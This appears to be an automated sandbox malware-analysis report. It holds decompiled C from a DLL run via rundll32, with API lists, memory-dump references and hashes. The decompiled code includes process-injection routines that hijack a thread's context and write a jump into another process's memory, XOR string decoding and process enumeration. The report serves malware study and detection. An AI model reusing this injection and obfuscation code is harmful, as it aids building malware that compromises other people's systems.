                                                                                                                                                                          						_t144 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          						_t211 =  &(_t211[5]);
                                                                                                                                                                          						 *((intOrPtr*)(_t144 + 0x10c))(L"USERPROFILE", _t206, "TEMP");
                                                                                                                                                                          					}
                                                                                                                                                                          					_push(0x20a);
                                                                                                                                                                          					_t53 = _t199 + 0x122a; // 0x122a
                                                                                                                                                                          					_t155 = L"TEMP";
                                                                                                                                                                          					_t119 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_push(_t155);
                                                                                                                                                                          					if( *((intOrPtr*)(_t119 + 0xf0))() == 0) {
                                                                                                                                                                          						_t141 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          						 *((intOrPtr*)(_t141 + 0x10c))(_t155, _t206);
                                                                                                                                                                          					}
                                                                                                                                                                          					_push(0x40);
                                                                                                                                                                          					_t207 = L"SystemDrive";
                                                                                                                                                                          					_push( &_v144);
                                                                                                                                                                          					_t122 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_push(_t207);
                                                                                                                                                                          					if( *((intOrPtr*)(_t122 + 0xf0))() == 0) {
                                                                                                                                                                          						_t139 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          						 *((intOrPtr*)(_t139 + 0x10c))(_t207, L"C:");
                                                                                                                                                                          					}
                                                                                                                                                                          					_v8 = 0x7f;
                                                                                                                                                                          					_t61 = _t199 + 0x199c; // 0x199c
                                                                                                                                                                          					_t126 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					 *((intOrPtr*)(_t126 + 0xc0))(_t61,  &_v8);
                                                                                                                                                                          					_t64 = _t199 + 0x100c; // 0x100c
                                                                                                                                                                          					E10014B0E(E1000E6E9(_t64, E1000CF09(_t64), 0),  &_v2644);
                                                                                                                                                                          					_t65 = _t199 + 0x1858; // 0x1858
                                                                                                                                                                          					E10014AE0( &_v2644, _t65, 0x20);
                                                                                                                                                                          					_push( &_v2644);
                                                                                                                                                                          					_push(0x1e);
                                                                                                                                                                          					_t68 = _t199 + 0x1878; // 0x1878
                                                                                                                                                                          					_t198 = 0x14;
                                                                                                                                                                          					E100096F3(_t68, _t198);
                                                                                                                                                                          					_t137 = E1000B5E5(_t68, _t198); // executed
                                                                                                                                                                          					 *((intOrPtr*)(_t199 + 0x1898)) = _t137;
                                                                                                                                                                          					return _t199;
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t70;
                                                                                                                                                                          			}
























































                                                                                                                                                                          0x1000bc31
                                                                                                                                                                          0x1000bc3b
                                                                                                                                                                          0x1000bc47
                                                                                                                                                                          0x1000bc4c
                                                                                                                                                                          0x1000bc51
                                                                                                                                                                          0x1000bc5e
                                                                                                                                                                          0x1000bc64
                                                                                                                                                                          0x1000bc69
                                                                                                                                                                          0x1000bc6f
                                                                                                                                                                          0x1000bc7f
                                                                                                                                                                          0x1000bc84
                                                                                                                                                                          0x1000bc89
                                                                                                                                                                          0x1000bc89
                                                                                                                                                                          0x1000bc91
                                                                                                                                                                          0x1000bc96
                                                                                                                                                                          0x1000bc97
                                                                                                                                                                          0x1000bca1
                                                                                                                                                                          0x1000bcaa
                                                                                                                                                                          0x1000bcaa
                                                                                                                                                                          0x1000bcb0
                                                                                                                                                                          0x1000bcbd
                                                                                                                                                                          0x1000bcc2
                                                                                                                                                                          0x1000bcc8
                                                                                                                                                                          0x1000bcd1
                                                                                                                                                                          0x1000bcdf
                                                                                                                                                                          0x1000bce6
                                                                                                                                                                          0x1000bceb
                                                                                                                                                                          0x1000bceb
                                                                                                                                                                          0x1000bcec
                                                                                                                                                                          0x1000bcd3
                                                                                                                                                                          0x1000bcd3
                                                                                                                                                                          0x1000bcd3
                                                                                                                                                                          0x1000bcf2
                                                                                                                                                                          0x1000bcf8
                                                                                                                                                                          0x1000bcfd
                                                                                                                                                                          0x1000bd03
                                                                                                                                                                          0x1000bd08
                                                                                                                                                                          0x1000bd0e
                                                                                                                                                                          0x1000bd0e
                                                                                                                                                                          0x1000bd17
                                                                                                                                                                          0x1000bd1d
                                                                                                                                                                          0x1000bd21
                                                                                                                                                                          0x1000bd28
                                                                                                                                                                          0x1000bd2f
                                                                                                                                                                          0x1000bd36
                                                                                                                                                                          0x1000bd3a
                                                                                                                                                                          0x1000bd41
                                                                                                                                                                          0x1000bd42
                                                                                                                                                                          0x1000bd44
                                                                                                                                                                          0x1000bd49
                                                                                                                                                                          0x1000bd50
                                                                                                                                                                          0x1000bd52
                                                                                                                                                                          0x1000bd52
                                                                                                                                                                          0x1000bd58
                                                                                                                                                                          0x1000bd62
                                                                                                                                                                          0x1000bd67
                                                                                                                                                                          0x1000bd67
                                                                                                                                                                          0x1000bd72
                                                                                                                                                                          0x1000bd7f
                                                                                                                                                                          0x1000bd92
                                                                                                                                                                          0x1000bd81
                                                                                                                                                                          0x1000bd83
                                                                                                                                                                          0x1000bd83
                                                                                                                                                                          0x1000bd97
                                                                                                                                                                          0x1000bd9c
                                                                                                                                                                          0x1000bda2
                                                                                                                                                                          0x1000bda4
                                                                                                                                                                          0x1000bdad
                                                                                                                                                                          0x1000bdad
                                                                                                                                                                          0x1000bdb5
                                                                                                                                                                          0x1000bdba
                                                                                                                                                                          0x1000bdba
                                                                                                                                                                          0x1000bdc0
                                                                                                                                                                          0x1000bdcb
                                                                                                                                                                          0x1000bdd0
                                                                                                                                                                          0x1000bdd8
                                                                                                                                                                          0x1000bdde
                                                                                                                                                                          0x1000bde6
                                                                                                                                                                          0x1000bdf8
                                                                                                                                                                          0x1000bdfe
                                                                                                                                                                          0x1000be06
                                                                                                                                                                          0x1000be0b
                                                                                                                                                                          0x1000be18
                                                                                                                                                                          0x1000be29
                                                                                                                                                                          0x1000be2f
                                                                                                                                                                          0x1000be34
                                                                                                                                                                          0x1000be37
                                                                                                                                                                          0x1000be3a
                                                                                                                                                                          0x1000be47
                                                                                                                                                                          0x1000be4d
                                                                                                                                                                          0x1000be57
                                                                                                                                                                          0x1000be57
                                                                                                                                                                          0x1000be5d
                                                                                                                                                                          0x1000be65
                                                                                                                                                                          0x1000be70
                                                                                                                                                                          0x1000be75
                                                                                                                                                                          0x1000be7b
                                                                                                                                                                          0x1000be7d
                                                                                                                                                                          0x1000be8a
                                                                                                                                                                          0x1000be8b
                                                                                                                                                                          0x1000be8c
                                                                                                                                                                          0x1000be97
                                                                                                                                                                          0x1000be99
                                                                                                                                                                          0x1000bea0
                                                                                                                                                                          0x1000bea0
                                                                                                                                                                          0x1000beaa
                                                                                                                                                                          0x1000beaf
                                                                                                                                                                          0x1000beb4
                                                                                                                                                                          0x1000beb4
                                                                                                                                                                          0x1000beba
                                                                                                                                                                          0x1000bec1
                                                                                                                                                                          0x1000bec2
                                                                                                                                                                          0x1000becf
                                                                                                                                                                          0x1000bee2
                                                                                                                                                                          0x1000bee7
                                                                                                                                                                          0x1000beec
                                                                                                                                                                          0x1000bef5
                                                                                                                                                                          0x1000bef5
                                                                                                                                                                          0x1000befb
                                                                                                                                                                          0x1000bf00
                                                                                                                                                                          0x1000bf06
                                                                                                                                                                          0x1000bf0c
                                                                                                                                                                          0x1000bf11
                                                                                                                                                                          0x1000bf1a
                                                                                                                                                                          0x1000bf1c
                                                                                                                                                                          0x1000bf23
                                                                                                                                                                          0x1000bf23
                                                                                                                                                                          0x1000bf29
                                                                                                                                                                          0x1000bf31
                                                                                                                                                                          0x1000bf36
                                                                                                                                                                          0x1000bf37
                                                                                                                                                                          0x1000bf3c
                                                                                                                                                                          0x1000bf45
                                                                                                                                                                          0x1000bf47
                                                                                                                                                                          0x1000bf52
                                                                                                                                                                          0x1000bf52
                                                                                                                                                                          0x1000bf5b
                                                                                                                                                                          0x1000bf63
                                                                                                                                                                          0x1000bf6a
                                                                                                                                                                          0x1000bf6f
                                                                                                                                                                          0x1000bf7e
                                                                                                                                                                          0x1000bf96
                                                                                                                                                                          0x1000bf9d
                                                                                                                                                                          0x1000bfab
                                                                                                                                                                          0x1000bfb6
                                                                                                                                                                          0x1000bfb7
                                                                                                                                                                          0x1000bfbb
                                                                                                                                                                          0x1000bfc1
                                                                                                                                                                          0x1000bfc2
                                                                                                                                                                          0x1000bfca
                                                                                                                                                                          0x1000bfcf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000bfd7
                                                                                                                                                                          0x1000bfdb

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 1000BC58
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 1000BD52
                                                                                                                                                                          • GetVersionExA.KERNEL32(00000000,?,?,00000000), ref: 1000BE3A
                                                                                                                                                                            • Part of subcall function 1000DD67: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000DE0B
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000000), ref: 1000BE65
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ChangeCloseCurrentDirectoryErrorFindLastNotificationProcessVersionWindows
                                                                                                                                                                          • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                          • API String ID: 3040727122-2706916422
                                                                                                                                                                          • Opcode ID: fbc1d6fbbc6ccd917195631cae4b8df202594f1322d43dd4a76b281c4d76eeaa
                                                                                                                                                                          • Instruction ID: 223de3120ca2146f2b08ea88d8ddf8a015e776c32fe29826ff6494a04fce2d39
                                                                                                                                                                          • Opcode Fuzzy Hash: fbc1d6fbbc6ccd917195631cae4b8df202594f1322d43dd4a76b281c4d76eeaa
                                                                                                                                                                          • Instruction Fuzzy Hash: 49A18E35700616AFE714EF70DC89FEAB7E9FF08340F10016AF5099B656EB70AA458B91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                          			_entry_(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                          				void _v257;
                                                                                                                                                                          				char _v258;
                                                                                                                                                                          				char _v260;
                                                                                                                                                                          				short _v772;
                                                                                                                                                                          				intOrPtr _t21;
                                                                                                                                                                          				WCHAR* _t28;
                                                                                                                                                                          				long _t29;
                                                                                                                                                                          				char _t32;
                                                                                                                                                                          				char _t33;
                                                                                                                                                                          				int _t44;
                                                                                                                                                                          				void* _t48;
                                                                                                                                                                          				void* _t58;
                                                                                                                                                                          				int _t61;
                                                                                                                                                                          				intOrPtr* _t63;
                                                                                                                                                                          
                                                                                                                                                                          				_t48 = __ecx;
                                                                                                                                                                          				if(_a8 != 1) {
                                                                                                                                                                          					if(_a8 != 0) {
                                                                                                                                                                          						L11:
                                                                                                                                                                          						return 1;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t21 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					 *((intOrPtr*)(_t21 + 0xbc))(0xaa);
                                                                                                                                                                          					L3:
                                                                                                                                                                          					return 0;
                                                                                                                                                                          				}
                                                                                                                                                                          				E100091D2();
                                                                                                                                                                          				E100095AD();
                                                                                                                                                                          				 *0x10020fa8 = _a4;
                                                                                                                                                                          				 *0x10020fa4 = 1;
                                                                                                                                                                          				E1001443B(_a4);
                                                                                                                                                                          				 *_t63 = 0x14c; // executed
                                                                                                                                                                          				_t28 = E100091B2(_t48); // executed
                                                                                                                                                                          				_a8 = _t28;
                                                                                                                                                                          				_t29 = GetFileAttributesW(_t28); // executed
                                                                                                                                                                          				if(_t29 == 0xffffffff) {
                                                                                                                                                                          					E10009E2E( &_a8);
                                                                                                                                                                          					_t58 = 0x14;
                                                                                                                                                                          					_t61 = 0;
                                                                                                                                                                          					do {
                                                                                                                                                                          						_t32 =  *0x1001d868; // 0x6665
                                                                                                                                                                          						_v260 = _t32;
                                                                                                                                                                          						_t33 =  *0x1001d86a; // 0x0
                                                                                                                                                                          						_v258 = _t33;
                                                                                                                                                                          						memset( &_v257, 0, 0xfd);
                                                                                                                                                                          						memset( &_v772, 0, 0x200);
                                                                                                                                                                          						_t63 = _t63 + 0x18;
                                                                                                                                                                          						MultiByteToWideChar(0, 0,  &_v260, 0xffffffff,  &_v772, 0xff);
                                                                                                                                                                          						_t58 = _t58 - 1;
                                                                                                                                                                          					} while (_t58 != 0);
                                                                                                                                                                          					 *0x10020fa0 = E10009559(0x144, 0x26e);
                                                                                                                                                                          					_a8 =  *[fs:0x30];
                                                                                                                                                                          					if(_a8[1] == 0) {
                                                                                                                                                                          						L10:
                                                                                                                                                                          						goto L11;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t44 = 0;
                                                                                                                                                                          					do {
                                                                                                                                                                          						 *(_t44 + 0x1001f820) =  *(_t44 + 0x1001f820) ^ 0x00000009;
                                                                                                                                                                          						_t44 = _t44 + 1;
                                                                                                                                                                          					} while (_t44 < 0x80);
                                                                                                                                                                          					do {
                                                                                                                                                                          						 *(_t61 + 0x1001f050) =  *(_t61 + 0x1001f050) ^ 0x000000aa;
                                                                                                                                                                          						_t61 = _t61 + 1;
                                                                                                                                                                          					} while (_t61 < 0x80);
                                                                                                                                                                          					goto L10;
                                                                                                                                                                          				}
                                                                                                                                                                          				E10009E2E( &_a8);
                                                                                                                                                                          				goto L3;
                                                                                                                                                                          			}

















                                                                                                                                                                          0x10001015
                                                                                                                                                                          0x10001025
                                                                                                                                                                          0x1000113d
                                                                                                                                                                          0x10001132
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10001132
                                                                                                                                                                          0x1000113f
                                                                                                                                                                          0x10001149
                                                                                                                                                                          0x1000106f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000106f
                                                                                                                                                                          0x1000102b
                                                                                                                                                                          0x10001030
                                                                                                                                                                          0x10001039
                                                                                                                                                                          0x1000103e
                                                                                                                                                                          0x10001044
                                                                                                                                                                          0x10001049
                                                                                                                                                                          0x10001050
                                                                                                                                                                          0x10001057
                                                                                                                                                                          0x1000105a
                                                                                                                                                                          0x10001066
                                                                                                                                                                          0x10001079
                                                                                                                                                                          0x10001081
                                                                                                                                                                          0x10001082
                                                                                                                                                                          0x10001084
                                                                                                                                                                          0x10001084
                                                                                                                                                                          0x1000108a
                                                                                                                                                                          0x10001091
                                                                                                                                                                          0x1000109b
                                                                                                                                                                          0x100010a9
                                                                                                                                                                          0x100010bb
                                                                                                                                                                          0x100010c0
                                                                                                                                                                          0x100010da
                                                                                                                                                                          0x100010e0
                                                                                                                                                                          0x100010e0
                                                                                                                                                                          0x100010fa
                                                                                                                                                                          0x10001105
                                                                                                                                                                          0x1000110f
                                                                                                                                                                          0x10001130
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10001131
                                                                                                                                                                          0x10001111
                                                                                                                                                                          0x10001118
                                                                                                                                                                          0x10001118
                                                                                                                                                                          0x1000111f
                                                                                                                                                                          0x10001120
                                                                                                                                                                          0x10001124
                                                                                                                                                                          0x10001124
                                                                                                                                                                          0x1000112b
                                                                                                                                                                          0x1000112c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10001124
                                                                                                                                                                          0x10001069
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 100091D2: HeapCreate.KERNELBASE(00000000,00096000,00000000,10001030), ref: 100091DB
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000000), ref: 1000105A
                                                                                                                                                                          • memset.MSVCRT ref: 100010A9
                                                                                                                                                                          • memset.MSVCRT ref: 100010BB
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 100010DA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$AttributesByteCharCreateFileHeapMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 371002992-0
                                                                                                                                                                          • Opcode ID: 28873a3474076a0a1097ffed1451b07b1029636ba8c8a1e835ed3268a5f7cc5d
                                                                                                                                                                          • Instruction ID: 590752042698cd2f4cdee0f974b65d0578b31557d413badee9f24b4b120a3a80
                                                                                                                                                                          • Opcode Fuzzy Hash: 28873a3474076a0a1097ffed1451b07b1029636ba8c8a1e835ed3268a5f7cc5d
                                                                                                                                                                          • Instruction Fuzzy Hash: D531E6756003656FE720DF68CC49BDA77E9EB093A0F10816AF558CB1C6D774D981CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 179 1000a93e-1000a95c call 1000a51f 182 1000a962-1000a999 call 1000936a GetThreadContext 179->182 183 1000aa0e 179->183 182->183 187 1000a99b-1000a9b0 182->187 184 1000aa10-1000aa14 183->184 188 1000a9c2-1000a9c6 187->188 189 1000a9b2-1000a9c0 187->189 191 1000aa34-1000aa36 188->191 192 1000a9c8-1000a9cd 188->192 190 1000a9ce-1000aa0a NtProtectVirtualMemory NtWriteVirtualMemory 189->190 193 1000aa15-1000aa32 NtProtectVirtualMemory 190->193 194 1000aa0c 190->194 191->184 192->190 193->183 194->183
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1000A93E(void* __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                          				long _v8;
                                                                                                                                                                          				intOrPtr _v15;
                                                                                                                                                                          				void _v16;
                                                                                                                                                                          				long _v20;
                                                                                                                                                                          				void* _v24;
                                                                                                                                                                          				long _v28;
                                                                                                                                                                          				void* _v32;
                                                                                                                                                                          				struct _CONTEXT _v748;
                                                                                                                                                                          				void* _t34;
                                                                                                                                                                          				void _t43;
                                                                                                                                                                          				void* _t61;
                                                                                                                                                                          				long _t62;
                                                                                                                                                                          				void* _t65;
                                                                                                                                                                          				void** _t68;
                                                                                                                                                                          				void* _t69;
                                                                                                                                                                          
                                                                                                                                                                          				_t68 = __edx;
                                                                                                                                                                          				_t61 = __ecx;
                                                                                                                                                                          				_t34 = E1000A51F( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                          				_t69 = _t34;
                                                                                                                                                                          				if(_t69 == 0) {
                                                                                                                                                                          					L8:
                                                                                                                                                                          					return _t69;
                                                                                                                                                                          				}
                                                                                                                                                                          				E1000936A( &_v748, 0, 0x2cc);
                                                                                                                                                                          				_v748.ContextFlags = 0x10002;
                                                                                                                                                                          				if(GetThreadContext( *(__edx + 4),  &_v748) == 0) {
                                                                                                                                                                          					goto L8;
                                                                                                                                                                          				}
                                                                                                                                                                          				_v20 = _v20 & 0x00000000;
                                                                                                                                                                          				_t65 = _v748.Eax;
                                                                                                                                                                          				_t43 = _t69 - _a4 + _t61;
                                                                                                                                                                          				if(_a8 != 1) {
                                                                                                                                                                          					if(_a8 != 2) {
                                                                                                                                                                          						return 0;
                                                                                                                                                                          					}
                                                                                                                                                                          					_v16 = _t43;
                                                                                                                                                                          					_t62 = 8;
                                                                                                                                                                          					L6:
                                                                                                                                                                          					_v32 = _t65;
                                                                                                                                                                          					_v24 = _t65;
                                                                                                                                                                          					_v8 = _t62;
                                                                                                                                                                          					NtProtectVirtualMemory( *_t68,  &_v24,  &_v8, 4,  &_v20);
                                                                                                                                                                          					if(NtWriteVirtualMemory( *_t68, _v748.Eax,  &_v16, _t62,  &_v8) >= 0) {
                                                                                                                                                                          						_v28 = _v28 & 0x00000000;
                                                                                                                                                                          						NtProtectVirtualMemory( *_t68,  &_v32,  &_v8, _v20,  &_v28);
                                                                                                                                                                          					} else {
                                                                                                                                                                          						_t69 = 0;
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L8;
                                                                                                                                                                          				}
                                                                                                                                                                          				_v16 = 0xe9;
                                                                                                                                                                          				_t62 = 5;
                                                                                                                                                                          				_v15 = _t43 - _t65 - _t62;
                                                                                                                                                                          				goto L6;
                                                                                                                                                                          			}


















                                                                                                                                                                          0x1000a94a
                                                                                                                                                                          0x1000a94c
                                                                                                                                                                          0x1000a953
                                                                                                                                                                          0x1000a958
                                                                                                                                                                          0x1000a95c
                                                                                                                                                                          0x1000aa0e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000aa0e
                                                                                                                                                                          0x1000a970
                                                                                                                                                                          0x1000a978
                                                                                                                                                                          0x1000a999
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a99b
                                                                                                                                                                          0x1000a9a4
                                                                                                                                                                          0x1000a9aa
                                                                                                                                                                          0x1000a9b0
                                                                                                                                                                          0x1000a9c6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000aa34
                                                                                                                                                                          0x1000a9ca
                                                                                                                                                                          0x1000a9cd
                                                                                                                                                                          0x1000a9ce
                                                                                                                                                                          0x1000a9d1
                                                                                                                                                                          0x1000a9da
                                                                                                                                                                          0x1000a9e1
                                                                                                                                                                          0x1000a9ec
                                                                                                                                                                          0x1000aa0a
                                                                                                                                                                          0x1000aa15
                                                                                                                                                                          0x1000aa2f
                                                                                                                                                                          0x1000aa0c
                                                                                                                                                                          0x1000aa0c
                                                                                                                                                                          0x1000aa0c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000aa0a
                                                                                                                                                                          0x1000a9b6
                                                                                                                                                                          0x1000a9ba
                                                                                                                                                                          0x1000a9bd
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 1000A51F: NtAllocateVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00003000,00000040,?,00000000,100043D8,?,?,?,1000A958,?,00000000), ref: 1000A55A
                                                                                                                                                                            • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                          • GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000A991
                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 1000A9EC
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,00000002,00000008,00000001,?,00000000,00000000), ref: 1000AA05
                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000000,00000000,?,00000000,00000000), ref: 1000AA2F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryVirtual$Protect$AllocateContextThreadWritememset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4020149312-0
                                                                                                                                                                          • Opcode ID: e0d01ad82f77ed8853515b14406a5400482392919babf8e97fcb1cd750ba68c8
                                                                                                                                                                          • Instruction ID: d2ed932ffaf4f6edbd0bce7d0d5901d33af284a1343d289a9543d0866ce73f30
                                                                                                                                                                          • Opcode Fuzzy Hash: e0d01ad82f77ed8853515b14406a5400482392919babf8e97fcb1cd750ba68c8
                                                                                                                                                                          • Instruction Fuzzy Hash: 72313C76A0021AAFEB10CF94CD89EEEBBB9EB09354F104266E509E7154D7709B84CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                          			E1000C800(void* __ecx, void* __edx) {
                                                                                                                                                                          				void* _v304;
                                                                                                                                                                          				void* _v308;
                                                                                                                                                                          				intOrPtr _v312;
                                                                                                                                                                          				char _v316;
                                                                                                                                                                          				signed int _t20;
                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                          				char _t27;
                                                                                                                                                                          				intOrPtr _t37;
                                                                                                                                                                          				void* _t40;
                                                                                                                                                                          				void* _t51;
                                                                                                                                                                          				void* _t55;
                                                                                                                                                                          				void* _t57;
                                                                                                                                                                          
                                                                                                                                                                          				_t40 = __edx;
                                                                                                                                                                          				_v304 = __ecx;
                                                                                                                                                                          				_t20 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                          				_t57 = _t20;
                                                                                                                                                                          				_t21 = _t20 | 0xffffffff;
                                                                                                                                                                          				if(_t57 != _t21) {
                                                                                                                                                                          					E1000936A( &_v304, 0, 0x128);
                                                                                                                                                                          					_v304 = 0x128;
                                                                                                                                                                          					if(Process32First(_t57,  &_v304) != 0) {
                                                                                                                                                                          						_t27 = E100091E7(0x20);
                                                                                                                                                                          						_v316 = _t27;
                                                                                                                                                                          						_t51 = 0x1f;
                                                                                                                                                                          						do {
                                                                                                                                                                          							_t9 = _t51 + 0x63; // 0x82
                                                                                                                                                                          							 *((char*)(_t51 + _t27)) = _t9;
                                                                                                                                                                          							_t51 = _t51 - 1;
                                                                                                                                                                          						} while (_t51 >= 0);
                                                                                                                                                                          						E10009203( &_v316, 0);
                                                                                                                                                                          						do {
                                                                                                                                                                          							_t55 = _v312( &_v308, _t40);
                                                                                                                                                                          						} while (_t55 != 0 && Process32Next(_t57,  &_v308) != 0);
                                                                                                                                                                          						FindCloseChangeNotification(_t57);
                                                                                                                                                                          						_t21 = 0 | _t55 == 0x00000000;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						_t37 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          						 *((intOrPtr*)(_t37 + 0x34))(_t57);
                                                                                                                                                                          						_t21 = 0xfffffffe;
                                                                                                                                                                          					}
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t21;
                                                                                                                                                                          			}















                                                                                                                                                                          0x1000c818
                                                                                                                                                                          0x1000c81a
                                                                                                                                                                          0x1000c81e
                                                                                                                                                                          0x1000c821
                                                                                                                                                                          0x1000c823
                                                                                                                                                                          0x1000c828
                                                                                                                                                                          0x1000c83b
                                                                                                                                                                          0x1000c843
                                                                                                                                                                          0x1000c857
                                                                                                                                                                          0x1000c869
                                                                                                                                                                          0x1000c871
                                                                                                                                                                          0x1000c875
                                                                                                                                                                          0x1000c876
                                                                                                                                                                          0x1000c876
                                                                                                                                                                          0x1000c879
                                                                                                                                                                          0x1000c87c
                                                                                                                                                                          0x1000c87c
                                                                                                                                                                          0x1000c888
                                                                                                                                                                          0x1000c88f
                                                                                                                                                                          0x1000c899
                                                                                                                                                                          0x1000c89d
                                                                                                                                                                          0x1000c8ba
                                                                                                                                                                          0x1000c8c1
                                                                                                                                                                          0x1000c859
                                                                                                                                                                          0x1000c859
                                                                                                                                                                          0x1000c85f
                                                                                                                                                                          0x1000c864
                                                                                                                                                                          0x1000c864
                                                                                                                                                                          0x1000c857
                                                                                                                                                                          0x1000c8ca

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 1000C81E
                                                                                                                                                                            • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 1000C852
                                                                                                                                                                          • Process32Next.KERNEL32(00000000,?), ref: 1000C8AD
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 1000C8BA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
